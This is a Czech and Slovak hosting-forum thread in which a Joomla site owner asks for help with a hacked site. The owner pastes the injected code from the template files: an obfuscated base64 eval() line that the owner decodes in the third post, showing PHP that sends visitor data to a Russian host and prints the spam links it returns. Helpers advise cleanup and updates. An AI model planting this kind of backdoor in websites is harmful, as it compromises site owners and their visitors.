#1 2014-05-28 00:33:38

filll
Člen
Registrován: 2012-10-19
Příspěvky: 43

Automatický reload webu

Dobrý den,

obracím na místní uživatele s prosbou o pomoc. Dnes jsem náhodou zjistil, že můj web www.dumchleba.cz se po zobrazení neustále aktualizuje (realoaduje/F5) vždy asi po 3 s. Podíval jsem se do zdrojového kódu, kde jsem dole našel úplně dole podezřelý script:

<body onload="check();">
<script type="text/javascript">
function check() {
    document.cookie = "60767B17-9386-42ae-BBA9-D1BCA9E8837B=Checked; expires=Wed, 28-May-2014 09:34:08 GMT; path=/";
    if (document.cookie && document.cookie.indexOf('60767B17-9386-42ae-BBA9-D1BCA9E8837B') != -1)
        location.reload(true);
    else
        document.write("     Cookies.");
}
</script>
<noscript>     JavaScript.</noscript>

Tento script jsem se snažil nalézt v několika souborech pro šablony (adresář templates na serveru). V několika index.php jsem našel (antivir dokonce hlásil infiltraci při kopírování těchto napadených souborů do PC) následující kód, který jsem smazal kde se jen dalo:

<!-- begin cache page --><?php eval(base64_decode("DQpmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c19jdXJsKCR1cmwpIHsNCgkkY2ggPSBjdXJsX2luaXQoKTsNCgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsNCgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOw0KCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICJMT0NBTFNBUEUiKTsNCgkkZGF0YSA9IGN1cmxfZXhlYygkY2gpOw0KCWN1cmxfY2xvc2UoJGNoKTsNCglyZXR1cm4gJGRhdGE7DQp9DQokbGlua3MgPSBmaWxlX2dldF9jb250ZW50c19jdXJsKCJodHRwOi8vcHJzYXBlLmphc29ubmV2aW5zLnJ1L2dldGxpbmtzLnBocD9hcGljb2RlPWxhbGFsYTQ0JnBhZ2V1cmw9Ii51cmxlbmNvZGUoImh0dHA6Ly8iLiRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4iJnVzZXJhZ2VudD0iLnVybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLiIiKTsNCmVjaG8gJGxpbmtzOw0K")); ?><!-- end cache page --><!-- begin variable sape code --><!-- end variable sape code -->


Ovšem stránky se stále realoadujou a ve zdrojovém kódu je neustále výše uvedený script. Nevíte prosím někdo jaké další soubory by mohli být napadany? Je to vskutku hrozné, už podruhé během několika měsíců co je web hacknut. V lednu mě oprava stála x hodin práce a obrovské obstrukce kolem toho. Nevím co mě čeká teď

Moc děkuji za případné rady a pomoc

Offline

#2 2014-05-28 09:04:21

Lkopo
Podpora
Registrován: 2010-02-12
Příspěvky: 1,916
Web

Re: Automatický reload webu

Bolo to od začiatku, alebo po dlhšom čase? Je možné, že odstraňovaním tohto kódu si môžete odstrániť aj funkčnosť šablóny, lebo tam môže byť aj zakódovaný kód, ktorý je nevyhnutný pre správnu funkčnosť.

V tomto prípade, čo ste poslali sa nachádza jedine škodlivý zdrojový kód. Na stránke http://www.base64decode.org/ si môžete ten dlhý reťazec odkódovať a uvidíde, že sa snaží získať obsah z podozrivej webstránky, ktorý nakoniec aj na Vašu webstránku vypíše. Odporúčam prejsť každý PHP súbor šablóny a ak sa base64 nezhoduje všade, tak ich prv odkódovať a pozrieť sa čo je tam, potom buď celé vymazať alebo si zobrať iba tú časť, ktorá je pre systém nevyhnutná. Poprípade zmeniť celú šablónu a Joomlu aktualizovať. A taktiež šablóny brať z iného zdroja, je možné, že si daný portál, odkiaľ ste sťahovali robí na šablóny nejaké spätné vrátka, ktoré potom boti zneužívajú.

Offline

#3 2014-05-28 12:32:25

filll
Člen
Registrován: 2012-10-19
Příspěvky: 43

Re: Automatický reload webu

Díky za moc za rozbor mé situace. Právě že problém nastal nejspíš v pondělí, jelikož na webu (který funguje cca 2 roky) takřka denně pracuju, takže bych si toho všiml. A šablonu jsem nestahoval, využívám defaultní Beez5.

Po odkódovaní řetězce vypadá kód následovně:

function file_get_contents_curl($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, "LOCALSAPE");
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}
$links = file_get_contents_curl("http://prsape.jasonnevins.ru/getlinks.php?apicode=lalala44&pageurl=".urlencode("http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&useragent=".urlencode($_SERVER["HTTP_USER_AGENT"])."");
echo $links;

Odkazuje to na nějakou ruskou stránku http://prsape.jasonnevins.ru. Projedu tedy všechny php soubory šablony jak radíte a budu mazat škodlivý kód.

A nevíte jakým způsobem se tato infiltrace škodlivým kódem mohla stát? Já jsem totiž již několik týdnu na web neinstaloval žádné doplňky. Pouze vkládám a edituji články/informace/fotografie.

Offline

#4 2014-05-28 16:15:51

Lkopo
Podpora
Registrován: 2010-02-12
Příspěvky: 1,916
Web

Re: Automatický reload webu

Tým pádom odporúčam si aktualizovať Joomlu na najnovšiu verziu, ak nemáte. A stále dať aktualizovať včas.

Offline

#5 2014-05-28 16:53:52

filll
Člen
Registrován: 2012-10-19
Příspěvky: 43

Re: Automatický reload webu

No já využívám aktuální verzi Joomly 2.5 (2.5.8). Přejít na poslední verzi 3.5 si příliš netroufám, jelikož se bojím, že mi to stránky rozhodí. Web sice vypadá jednoduše, ale práce tam byly a jsou obrovské...

Offline

#6 2014-05-28 17:30:09

Destroyer
Endora rádce
Registrován: 2009-11-01
Příspěvky: 2,097
Web

Re: Automatický reload webu

po oprave muzete zkusit zkopirovat obsah ftp a databaze na vedlejsi domenu a provest update tam, a pokud se vse provede muzete jej nahodit i na hlavni web

Offline

Zápatí

Založeno na FluxBB | CZ a SK